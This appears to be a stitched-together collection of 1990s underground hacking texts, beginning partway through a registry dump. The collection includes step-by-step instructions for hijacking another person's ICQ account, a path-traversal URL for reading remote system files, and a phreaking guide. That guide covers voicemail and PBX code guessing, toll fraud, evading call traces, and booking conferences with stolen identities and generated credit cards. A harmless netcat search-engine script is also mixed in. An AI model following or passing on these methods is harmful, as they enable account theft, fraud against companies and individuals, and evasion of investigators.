"URL"="E-mail notification instructions"
"Date"="15-JUN-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message5]
"URLName"="http://www.icq.com/announcements/05.html"
"URL"="Create your Greeting"
"Date"="12-JUL-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message6]
"URLName"="http://www.icq.com/announcements/06.html"
"URL"="Click For More Information"
"Date"="26-AUG-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message7]
"Message"="ICQ can alert you when you receive Emails and show you the Email headers!"
"URLName"="http://www.icq.com/announcements/07.html"
"URL"="Learn how to do it"
"Date"="06-SEPT-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\MOTD\Message8]
"URLName"="http://www.icq.com/announcements/06.html"
"URL"="Click For More Information"
"Date"="20-OCT-98"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups]

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup1]
"Name"="General Chat"
"Number"=dword:00000001
"Version"=dword:00000001

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup2]
"Name"="Romance"
"Number"=dword:00000002
"Version"=dword:00000002

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup3]
"Name"="Games"
"Number"=dword:00000003
"Version"=dword:00000003

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup4]
"Name"="Students"
"Number"=dword:00000004
"Version"=dword:00000004

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup5]
"Name"="20 Something"
"Number"=dword:00000006
"Version"=dword:00000006

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup6]
"Name"="30 Something"
"Number"=dword:00000007
"Version"=dword:00000007

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup7]
"Name"="40 Something"
"Number"=dword:00000008
"Version"=dword:00000008

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\RandomGroups\RandomGroup8]
"Name"="50 Plus"
"Number"=dword:00000009
"Version"=dword:00000009

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers]

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Servers\Server1]
"Host"="icq1.mirabilis.com"
"Port"=dword:00000fa0

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals]

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Canasta]
"Type"="Command"
"Command Line"="/ip:"
"Path"="C:\\Program Files\\Canasta\\Canasta.exe"
"URL"="http://ourworld.compuserve.com/homepages/mharte"
"Version"=dword:0000000f

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Connectix VideoPhone]
"Type"="Extension"
"Format"="/p:tcp /ac:"
"Extension"="cvp"
"URL"="http://www.connectix.com/html/videophone.html"
"Version"=dword:00000009

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Cu-Seeme]
"Type"="Command"
"Command Line"=""
"Path"="C:\\CUSEEME\\CUSEEM32.EXE"
"URL"="http://www.cu-seeme.com/"
"Version"=dword:00000006

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\IRIS Phone]
"Type"="Extension"
"Format"=""
"Extension"="iru"
"URL"="http://irisphone.com/"
"Version"=dword:0000000a

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat]
"Type"="ServerExtension"
"Format"="1.1\\n-u 1 -a "
"Extension"="vce"
"NumParameters"=dword:00000002
"Server1"="vchat1.microsoft.com"
"URL"="http://vchat1.microsoft.com"
"Version"=dword:00000011

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param1]
"ParamName"="World"
"CanOtherChange"="No"
"Param1"="#Compass"
"Param2"="#BugWorld"
"Param3"="#Fishbowl"
"Param4"="#Lodge"
"Param5"="#Lunar"
"Param6"="#Lodge"
"Param7"="#Practice"
"Param8"="#RedDen"
"Param9"="#TableTop"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Microsoft VChat\Param2]
"ParamName"="Avatar"
"CanOtherChange"="Yes"
"Param1"="Amani"
"Param2"="Anderson"
"Param3"="Brb"
"Param4"="Cat"
"Param5"="Crab"
"Param6"="Dancer"
"Param7"="Dred"
"Param8"="Duggan"
"Param9"="Joey"
"Param10"="Lulu"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Netscape CoolTalk]
"Type"="Command"
"Command Line"=""
"Path"="C:\\Program Files\\Netscape\\Navigator\\CoolTalk\\CoolTalk.EXE"
"URL"="http://home.netscape.com/comprod/products/navigator/version_3.0/communication/cooltalk/index.html"
"Version"=dword:00000004

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Rikken on the Rockx]
"Type"="ClientServer"
"Client Command Line"="/CLIENT %i"
"Server Command Line"="/SERVER"
"Client Path"="C:\\Rikken\\Rikken.exe"
"Server Path"="C:\\Rikken\\Rikken.exe"
"URL"="http://www.dse.nl/~ramon/rikken/"
"Version"=dword:00000017

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VDOPhone]
"Type"="Extension"
"Format"="callto://"
"Extension"="vdp"
"URL"="http://www.vdo.net/download/"
"Version"=dword:00000003

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VidCall]
"Type"="Command"
"Command Line"=""
"Path"="C:\\VidCall\\Corp.EXE"
"URL"="http://www.access.digex.net/~vidcall/vidcall.html"
"Version"=dword:00000008

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\WebPhone]
"Type"="Extension"
"Format"=""
"Extension"="wpc"
"URL"="http://www.webphone.com/"
"Version"=dword:00000007

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\Quake]
"Type"="ClientServer"
"Client Command Line"="-mpath +connect %i"
"Server Command Line"="-mpath -listen"
"Client Path"="c:\\quake_sw\\Q95.bat"
"Server Path"="c:\\quake_sw\\Q95.bat"
"Server1"="quake.xmisson.com"
"URL"="http://www.idsoftware.com"
"Version"=dword:00000010

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat]
"Type"="ServerCommand"
"Format"="GROUPNAME=i PORT=15000"
"Path"="C:\\Program Files\\VoxChat\\VoxChat.exe"
"NumParameters"=dword:00000001
"Server1"="voxchat1.voxware.com"
"Server2"="voxcha2.voxware.com"
"URL"="http://www.voxchat.com/low/download.htm"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\Externals\VoxChat\Param1]
"ParamName"="Room"
"CanOtherChange"="No"
"Param1"="#ICQ"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Prefs\PhoneLocations]
"LastUpdate"=dword:00000000

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Main]
"SelectedCell"=dword:00000000
"AlwaysOnTop"="Yes"
"LeftBarWidth"=dword:000000ad
"RightBarWidth"=dword:000000ad
"FloatBar-Left"=dword:00000255
"FloatBar-Right"=dword:00000307
"FloatBar-Top"=dword:00000033
"FloatBar-Bottom"=dword:000001f3
"State"="Floating"
"Minimized"="No"

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Windows]
"Response"=dword:008f00c9
"SearchWiz"=dword:006f00c0
"NotifyWiz"=dword:006f00c0
"posNovice"=dword:009300dc
"posMOTD"=dword:00af00b7
"posMenuConfig"=dword:00a900e7
"RemoveUIN"=dword:00bb0108
"Message"=dword:008b004f
"Security"=dword:007400b4
"Prefs"=dword:007f00ae
"History"=dword:0096003a
"File Request"=dword:009000f0
"FileTransfer"=dword:009700ae
"Info"=dword:009300d2
"FetchUser"=dword:00e9010e
"URL Message"=dword:00a00069
"Away"=dword:00bd00f7
"Chat Request"=dword:009f00dd
"Contacts List"=dword:008300bd
"Chat"=dword:008b00f5
"Phone"=dword:000a000a
"Phone Call Request"=dword:007700e5

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\Search]
"Place"=dword:00a400cc
"Type"=dword:00000002
"Width"=dword:01880188

[HKEY_CURRENT_USER\Software\Mirabilis\ICQ\Owners\HACKEDUIN\ICQ Chat]
"ChatStyle Counter"=dword:00000003
"Pen Color"=dword:0080ffff
"Back Color"=dword:00004000
"Send Focus"="Yes"
"Enable Sounds"="Yes"
"Name Bars"="Yes"
"Always On Top"="No"
"AutoColor"="No"
"OverRide Format"="Yes"
"Show Toolbar"="Yes"
"State"=dword:00010000
"New Font Name"="Times New Roman"
"Char Set"=dword:00000000
"IRCListWidth"=dword:00000006
"Font Pitch"=dword:00000012
"New Font Height"=dword:0000000e
"Font Effects"=dword:00000000
"AutoColor 0"=dword:00000000
"AutoColor 1"=dword:00000080
"AutoColor 2"=dword:00008000
"AutoColor 3"=dword:00008080
"AutoColor 4"=dword:00800000
"AutoColor 5"=dword:00800080
"AutoColor 6"=dword:00808000
"AutoColor 7"=dword:00808080
"AutoColor 8"=dword:00c0c0c0
"AutoColor 9"=dword:000000ff
"AutoColor 10"=dword:0000ff00
"AutoColor 11"=dword:0000ffff
"AutoColor 12"=dword:00ff0000
"AutoColor 13"=dword:00ff00ff
"AutoColor 14"=dword:00ffff00
"AutoColor 15"=dword:00ffffff
"Place-Left"=dword:0000000a
"Place-Right"=dword:000001fe
"Place-Top"=dword:0000000a
"Place-Bottom"=dword:0000021a
"New LogFile name"="ICQChatLog.txt"
"New SaveFile name"="ICQChatSave.txt"

4. Save the file as HACKEDICQ.REG
5. If you have ICQ open, close it.
6. Copy all the files you got earlier (the idx and dat files) into your ICQ\DB directory 
ex: c:\progra~1\ICQ\db
7. Open the HACKEDICQ.REG file
8. When it asks if you would like to add this to your registry, click YES.
9. Open the DB convert program in your ICQ directory (It comes with ICQ99), then click on "Convert a old DB"
10. When it's done converting, close the DB converter. It should start ICQ automatically, but if it doesn't, open it
manually.
11. If ICQ doesn't already start in the Hacked UIN, click on the ICQ menu, click on "Add/Change Current User", then
click on "Change the Active User". Choose Hacked UIN. If it asks for the password, there's 2 things that may have
happened:

I. They have the protection set on high. The only way of getting past the protection is to download the ICQ CRACK.
II. They are sill online. The only thing you can do is wait until they go offline.

12. Once you are successfully in the users ICQ, quickly change the users password. Once this is complete, you will be in
total control over the users ICQ account. Mission success.

ICQ Exploit Tips
-----------------

Remember in the last text I wrote? I told you to download the command.com. There's a better way to find out the
Windows version, and more info with it, too. Get the file http://123.123.123.123/.html/......../msdos.sys.

I saw in the original ICQ Exploit text that the HTTP server Exploit doesn't work on NT, so i went in NT and i tested it.
The result was system wasn't exploitable. Hence, if you are running NT, and you want to use the HTTP server; it's 100%
safe for you to do so.

Shadow51
29000000
Shadow51@hackcity.com

(I Couldn't get in contact with the authors of this file, but it's a good text non the less so, In it goes - The Information is still relevant even though it's from 98 - CrossFire)

 - by uV & Senor Cardini - 

DISCLAIMER (All the information in this file is for educational purposes only. No-one involved in 
the compilation of this file would suggest using it for any purposes leagal/illegal whatsoever. In 
fact it might all be complete bollocks for all we know etc) 

!! Loadsa phun to be had on freephone numbers !! 

Freefone phreaking is calling freephone (0500/0800) numbers and using the interesting systems that 
are often on the other end. This often means accessing company's phone system to obtain free calls 
or services. I will cover the three main areas:- VMB Hacking, Dial-Outs and Conference System abuse. 

There are countless other systems on 0800's that are not covered here. 



You need to scan a lot of 0800/0500 numbers to find useful numbers. You can't use a scanning program 
like Toneloc here as you are not looking for a modem carrier signal. This means dialling hundreds of 
numbers by hand. Apparently BT are able to detect mass 0800 scanning done from your home phone but I 
know lots of people who have called 1000's and never heard a peep. Still a phone box is better if 
you're paranoid. 

You may reach foreign systems on UK 0800 numbers. The 0800 89XXXX range is full of these as is the 
0800 9XXXX range. These are also referred to as Country Direct numbers (check out the back of you BT 
Book). These are cool as you may get access to systems in that country. USA numbers a great because 
the US has loads more conferences, loops and PBX's than we do and lots of these are on the WWW. 

Companies are getting wise to abuse of their systems. Certain numbers are always getting hacked and 
are now completely blocked. It might be worth avoiding the 0800 89xxxx range for this reason 0500 
numbers don't get anywhere near as much attention...:-) 

So choose the range of numbers you are going to scan and get going. Make a note of what you find and 
what time you dialled. It is best to dial out of hours for whatever country the line terminates in. 
Otherwise a lot of numbers will be picked up by a human. You are looking for dial-tones, other tones 
and automated attendants, mail-boxes etc. 

Getting in: Let's say you have the number of an American company on a 0800 89XXXX. This might answer 
as "Welcome to ABC company voice-mail system, if you know the number of the person you want to reach 
dial it now. If you have a mail-box on the system press 9. If you want to reach assistance dial 0 or 
stay on the line`. Listen to the whole message - there may be other options. If you get no options 
try the * or # keys or combinations of these with numbers like 1,8 or 9. This may throw you into the 
voice mail. You may have to leave a message and then try to break out. 

Get a range: Try dialling some extensions and get an idea of the range of numbers accepted. You are 
starting to map the system. Some extensions (often at the end of the allowable range or a one off 
number like 2000, 4444 etc.) will have an out-dial on it. 
  





This is accessing voice-mail systems and using the features to your own ends. You  can set up your 
own free voice-mail box or listen to confidential messages etc. This is obviously boring after the 
first few times. The real interest comes when there is an out-dial, conference box or whatever on 
the system that is only accessible by valid mailbox owners. This centres around the fact that most 
VMB passwords are either the same as the box number (Box=3300, PW=3300), a crappy default (1234), 
easy to remember/guess (1111, 1234 etc.) or similar (box number+0). When you enter the voice-mail 
system it will often tell you what make it is Meridian, Octel, Norstar or whatever. This obviously 
helps a lot, although particularly sad individuals will come to recognise them by the prompts 
anyway. You really need to try all these numbers and map out systems for yourself to get a good idea 
of what's out there. 

There are loads of texts specific VMB brands. I reckon Meridian are the easiest to hack (pass-code 
is the box number as default and they have an excellent help facility - press the * key). I will 
only touch on Meridian systems to give you an idea of how they work. A lot of the points are 
relevant to other systems. 

Meridian Voice-mail:- I suggest you read Coldfire's text on Meridians. I won't go into details as he 
does it well and I don't want to quote it word for word. I will therefore cover the practical 
hacking aspects I will assume you will go get that text! 

Ok here are a few of the more essential ones 

011 is name-directory 
011# is dial any number/extension - depends on whether you're logged in/masks etc(see below) 

pressed (normally the opertator) - has some potential... 

Lets say you called a company, pressed * and got "Hello, you have reached the voice-mail system. If 
you have a mailbox on the system press pound(#), or if you wish to reach someone and know the 4 
digit extension please dial it now" If you press # you get "Meridian Mail. Mailbox?" - this is 
expecting a 4 digit code+# and a 4 digit-pass-code+#. Unfortunately you have no idea of the 
allowable codes. They could be random or more likely within a certain range. 3000 is normally a good 
shot BUT seeing as the login sequence will only let you know whether you have got BOTH codes correct 
you'll have a hard time hacking it. Go back to the original prompt and try some extension numbers 
until you get one or two that work. 

Seeing as the box numbers are always the same as the extension numbers so now you know some valid 
box numbers or better still the range of valid box numbers. Ideally you want unused boxes in their 
default state. These unused extension/boxes don't have a "Hi leave a message for John Smith here" on 
them. Depending where you are in the system. Dialling 011 will put you through to a directory system 
where you can dial in a name using the number/letter combinations on you telephone keypad. Try SMITH 
or JONES, you should get a few numbers this way. 

Once you have valid boxes you need the pass-codes, so go to the login (*81) and try the default 
pass-code, i.e. the box number itself. Empty boxes are more likely to work in this way, failing that 
try some 1234, 1111 sequences (good for thick giggly admin department boxes :)). You should be able 
to get at least one box this way. You will have noticed that 3 unsuccessful pass-code tries will 
throw you out. With one valid box you can get around this. Try 2 boxes then log into your valid box, 
now try two more and so on until you get more boxes. As long as you enter one valid code combination 
in 3 you are fine. This is the sort of feature that most systems have and makes hacking them much 
easier. 

To see if you have an out-dial here enter 09+number to dial+# if it dials you have got one (remember 
to work out what country your system is in first though). Which brings us on to.... 



This is basically dialling into a company's phone system (PBX), gaining access and dialling out. The 
net result is that you only pay for the call to the company. If this is an 0800 number then you 
don't pay anything. There are two ways you might come across out-dials. 

1.  Straight-forward PBX extenders 

Background:- A company wants it's sales staff to be able to call internationally from home for free 
so they set up an 0800 PBX extender. This allows the person to dial free to the company number and 
then out to the desired destination (on the company bill). They work mostly like this: you dial a 
certain number and get another dialling-tone, another sort of tone or even a voice-prompt ("enter 
your 4 digit ID" etc.). An incorrect tone will often give a two-tone alarm signal (don't worry it is 
just an audible prompt). Once you enter the correct code (normally plus a #) you may get another 
dial-tone which you can use as if dialling from you own phone. You may have to enter 9 or 0 or 
similar to get a line. You may need to add a # to the end of the number. 

Hacking them:- These are only easy to hack if the code is something stupid like 1111, 2222, 1234 
etc., +# which it often is. The first thing you need to know is the length of the code. You may be 
able to get this by entering in the numbers very slowly and listening. After the correct number of 
digits there may be the alarm tone or a soft click. If not you have to assume it is 4 or less. If it 
is not you are going to have a hell of a job cracking it anyway! Try the common defaults as 
described and any other easy-to-remember numbers. You may notice that it bleeps you out after only 2 
numbers when say entering 12 but after 4 numbers when trying 4567. This may be a clue to the start 
of the sequence. If you have a group of bored, nerdy friends (you may be a student for example.;-)) 
you can split up the 9999 possible combinations between you. This should only take 10 of you a 
couple of hours. The speed of these things is often dependant on how many tries a system lets you 
have before throwing you out. 
Another way is to use a PBX Hacker program which I won't go into except to say that they come with 
their own documentation, they don't often work unless you know the exact format of the switch (PBX) 
and can't be used from phone boxes (can you explain 9999 calls to the same number?!) 

2.  "Hidden" PBX's. 

Background:- Most larger companies have their own PBX systems with 0800 access numbers. Some of them 
will intentionally want people to be able to dial though them, others just don't know it can be done 
or have configured them incorrectly. Their out-dial may be on a certain extension or hidden behind a 
VMB (See the VMB section on Meridians) 

Hacking them:- This can be as easy as ringing the sales line 0800 of some company, asking for 
another dept, say accounts, asking to be put though to the operator and saying "Hi I'm Dave from 
accounts, I can't seem to get an outside line. Could you dial this number for me?" - this may or may 
not work!. There are a number of ways depending on the make of the system and the way it is 
configured. I can't give you a sure-fire way on all systems. You may just be able to dial 9+the- 
number-you-want+# or 09+.... Etc. You may have to try every extension until you get a tone. You may 
have to hack the systems admin. box first to change some options. You may have to hack a certain 
box. Meridian systems often allow 09+number+# but only after you have logged in successfully to a 
mail-box. There may be calling masks set up by the administrator which restrict outgoing calls to 
nil or a limited range (e.g. local calls or free-fone calls only). So (on most Meridians for 
example) having a valid box/code is not always enough. However, you may be able to fool the mask on 
a UK system by entering 141 in front of the number you want as the system is often checking for 
zeros. Keep trying different 0800 numbers until you find systems that you can hack. ANY fool can 
hack a Meridian. You will find some with out-dials once you have, you have got your phree calls 
without any fancy kit. 



Although you may be dialling an 0800 number you can be sure that there is a normal number like 01454 
654312 or whatever linked to it. If you dial 17070 (in BT areas) from your out-dial it will tell you 
what number you are really at. If this doesn't work dial your own number and do a 1471 job on it. 
This means that if you want to pretend to be someone else or specifically to pretend to be from that 
company you can! All but a really determined trace will do is show up the wrong number. 



Linking up your out-dials will extend their usefulness. If you have an 0800 out-dial that terminates 
in the USA thus allowing dialling to US numbers you can use it to dial 1-800 numbers which are the 
yank equivalent of our 0800 numbers. Americans are way ahead in the use of mail/switching systems 
and there are out-dials, conferences etc. abound. 



Using out-dials is obviously illegal. Not only are you gaining unauthorised access to a system (i.e. 
hacking) but you are stealing call credit from the company. BT and the company have a vested 
interest in stopping you or catching you. Here are some guidelines: 

I. The first rule is do not give the numbers/codes out to anyone else. As soon as you do you can be 
sure that they will too and so on, and so on. At least one of these people will be a twat, use it to 
call Mexican sex-lines for 4 hours at 2am on a Sunday. It will either get closed down or they will 
set up a trace. 
  
II. Use them wisely. As with all crime, you should be fine unless you get noticed. So if you call 
numbers that are likely to be called from that company, are of a normal length, during normal times 
etc. you are unlikely to raise any eyebrows. 
  
III. Linking out-dials up makes tracing your call much harder, especially if you cross international 
boundaries. This will often throw the phone companies systems and can make prosecution harder. The 
most likely way of tracing calls is going to be from the point which you 1st call in at. Seeing as 
you are only making freefone calls from that point it will not be showing up in any bills. They are 
not losing and are not monitoring. Should the second company notice they will trace it back to the 
first company. Do this through 3 or 4 and things start looking good for you! 
  
IV. Try not to use them from home 
  
V. Don't stay on for long. Using one out-dial to acess the Intenet for hours at a time  is one way 
of getting noticed. 
  
VI. Be paranoid. No matter how careful you are being, there may be others using the same out-dial 
recklessly. You could get caught in the same net. It is a good idea to tell you call recipient to 
have a cover story ready in case they are called to see who called them at a certain time. "Oh yeah, 
I have been getting odd calls, some time they just don't speak to I just leave the receiver off the 
hook and come back to it in an hour" or "Fuck off you running-dog capitalist pig I don't have to 
tell you anything". 
  


For spending hours talking to your geeky phrekin' mates you really need to start accessing 
conference systems. These are basically systems which join multiple lines together so all parties 
can speak to each other real-time. Those shite Partyline things are basically fucking expensive 
conferences (although now they are not allowed to even be real-time!). There are two general ways of 
accessing conferences. 

1.  Social Engineering/Carding 

This is a piece of piss. Ring up your directory enquiries or look on the Internet for 
teleconferencing numbers. A good way of accessing these things is to call the USA through one of 
your US-terminating out-dials. This allows you access to the many US based conferencing companies as 
well as hiding your phone number. You need some information before you call. Get some US names and 
addresses - check out the Internet. People often put such info. at the bottom of their newsgroup 
postings. The name, address, zip code and telephone number must match. Basically just ing them up 
and ask to set up a conference. The conversation will go something like this:- 
TC "Hello thank you for choosing XYX Teleconferencing Ltd, how may I help you?" 
You "Hi I would like to set up a conference please" 
TC "Sure when would you like it for?" 
You "in about 15 minutes" 
TC "How long for and for how many people sir?" 
You "4 hours and for twenty people please" 
TC "What is your company name, your name and address please" 
You "3M corporation, John Mackenzie, 1020 Slow St, Happy Valley. Minesota Zip code 12232" 
TC "Was that Mackintosh" - (how!?) 
You "No that MACKENZIE" 
TC "Sorry about that" 
You "No problem, it's a bad line" - probably because you're calling through 16 extenders! 
TC "And what's the billing number" 
You "that's 1-513-2344-3434" 
TC "Fine that has been set up - please dial 1-800-854-8554 to access your conference. The conference 
number will be 54334. What would you like for your pass-code?" 
You "Err 8232 please. Oh by the way, I have some people accessing the conference from the UK. What 
number do they need to dial?" 
TC "That will be 0800-756-3333" 
You "Thanks" 

Now you and your mates can call the relevant access numbers and enter the codes and get chatting. 
This works virtually every time with most of these companies - think about it, how the fuck are they 
supposed to find out who is vaild or not from that info. You can even get cheeky and use someone's 
account. Try calling AT&T teleconferencing and saying you are John Doe from some big company" Try 
anything you like. Remember they really don't know who you are. 

Some companies allow billing to a credit card. You can generate these pretty easily using 
CreditMaster and use them. This however does tend to carry a heavy penalty and also fucks over some 
poor unsuspecting member of the public (if that bothers you) Anyway there's no need. 

2.  Company Conferencing Systems 

Companies having realised how handy but expensive teleconferencing is have set up their own 
conference boxes. 

The most common one in the USA is Meeting Place. You will find these on the end of 0800 numbers or 
on extensions of Octel VM systems systems (try spelling MEETING into the directory to find the 
extension or just get scanning). They welcome you with "Welcome to Meeting Place. To attend a 
meeting press 1. To access your profile press 2 etc" What you need is a valid profile number. These 
a 3-17 digits but generally are between 4 and 6. You just have to keep trying until you find one. 
(There are default profiles on 0001, 0002 and 0003) The pass-code may be something like 123456. Once 
you are on these you can set up conferences when ever you like for loads of people. You can lock the 
session, form splinter sessions and boot people out like IRC. You don't need to know too much more 
as they are voice-prompt city. However there are some important features which stop you from getting 
noticed  - the exact layout of Meeting place is in another text file, cryptically entitled 
"Phreaking Conferences with Meeting Place". 
  

See ya 

uV and Senor Cardini 


Shouts to Darkcyde Communications + Hy8rid + Public Nuisance + Nitrous Oxide #! /bin/sh
## Hit the major search engines.  Hose the [large] output to a file!
## autoconverts multiple arguments into the right format for given servers --
## usually worda+wordb, with certain lame exceptions like dejanews.
## Extracting and post-sorting the URLs is highly recommended...
##
## Altavista currently handled by a separate script; may merge at some point.
##
## _H* original 950824, updated 951218 and 960209

test "${1}" = "" && echo 'Needs argument[s] to search for!' && exit 1
PLUSARG="`echo $* | sed 's/ /+/g'`"
PIPEARG="`echo ${PLUSARG} | sed 's/+/|/g'`"
IFILE=/tmp/.webq.$

# Don't have "nc"?  Get "netcat" from avian.org and add it to your toolkit.
doquery () {
  echo GET "$1" | nc -v -i 1 -w 30 "$2" "$3"
}

# changed since original: now supplying port numbers and separator lines...

echo "=== Yahoo ==="
doquery "/bin/search?p=${PLUSARG}&n=300&w=w&s=a" search.yahoo.com 80

echo '' ; echo "=== Webcrawler ==="
doquery "/cgi-bin/WebQuery?searchText=${PLUSARG}&maxHits=300" webcrawler.com 80

# the infoseek lamers want "registration" before they do a real search, but...
echo '' ; echo "=== Infoseek ==="
echo "  is broken."
# doquery "WW/IS/Titles?qt=${PLUSARG}" www2.infoseek.com 80
# ... which doesn't work cuz their lame server wants the extra newlines, WITH
# CRLF pairs ferkrissake.  Fuck 'em for now, they're hopelessly broken.  If
# you want to play, the basic idea and query formats follow.
# echo "GET /WW/IS/Titles?qt=${PLUSARG}" > $IFILE
# echo "" >> $IFILE
# nc -v -w 30 guide-p.infoseek.com 80 < $IFILE

# this is kinda flakey; might have to do twice??
echo '' ; echo "=== Opentext ==="
doquery "/omw/simplesearch?SearchFor=${PLUSARG}&mode=phrase" \
  search.opentext.com 80

# looks like inktomi will only take hits=100, or defaults back to 30
# we try to suppress all the stupid rating dots here, too
echo '' ; echo "=== Inktomi ==="
doquery "/query/?query=${PLUSARG}&hits=100" ink3.cs.berkeley.edu 1234 | \
  sed '/^<IMG ALT.*inktomi.*\.gif">$/d'

#djnews lame shit limits hits to 120 and has nonstandard format
echo '' ; echo "=== Dejanews ==="
doquery "/cgi-bin/nph-dnquery?query=${PIPEARG}+maxhits=110+format=terse+defaultOp=AND" \
  smithers.dejanews.com 80

# OLD lycos: used to work until they fucking BROKE it...
# doquery "/cgi-bin/pursuit?query=${PLUSARG}&maxhits=300&terse=1" \
#   query5.lycos.cs.cmu.edu 80
# NEW lycos: wants the User-agent field present in query or it returns nothing
# 960206: webmaster@lycos duly bitched at
# 960208: reply received; here's how we will now handle it:
echo \
"GET /cgi-bin/pursuit?query=${PLUSARG}&maxhits=300&terse=terse&matchmode=and&minscore=.5 HTTP/1.x" \
  > $IFILE
echo "User-agent: *FUCK OFF*" >> $IFILE
echo "Why: go ask todd@pointcom.com (Todd Whitney)" >> $IFILE
echo '' >> $IFILE
echo '' ; echo "=== Lycos ==="
nc -v -i 1 -w 30 twelve.srv.lycos.com 80 < $IFILE

rm -f $IFILE
exit 0

# CURRENTLY BROKEN [?]
# infoseek

# some args need to be redone to ensure whatever "and" mode applies
             _______ _              _______           _ 
            (_______) |            (_______)         | |
             _      | | _   ____    _____   ____   _ | |
            | |     | || \ / _  )  |  ___) |  _ \ / || |
            | |_____| | | ( (/ /   | |_____| | | ( (_| |
             \______)_| |_|\____)  |_______)_| |_|\____|

<*> Use this information at your own risk. Staff or contributors to
Underground Periodical, nor the persons providing or hosting
Underground Periodical, will NOT assume ANY responsibility for the use,
misuse, or abuse, of any information provided herein. The previous
information is provided for educational purposes ONLY. This information
is NOT to be used for any illegal purposes whatsoever.

<*> By reading Underground Periodical you ARE AGREEING to the following
terms: I understand that using this information is illegal. I agree to,
and understand, that I am responsible for my own actions. If I get into
trouble using this information for the wrong reasons, I promise not to
place the blame on Underground Periodical staff, contributors, or
anyone that provided this issue or any other issue of Underground
Periodical whether it were official or without notification. I
understand that this information is for educational purposes only.
Thanks for reading.

                       :..::..End Of File..::..: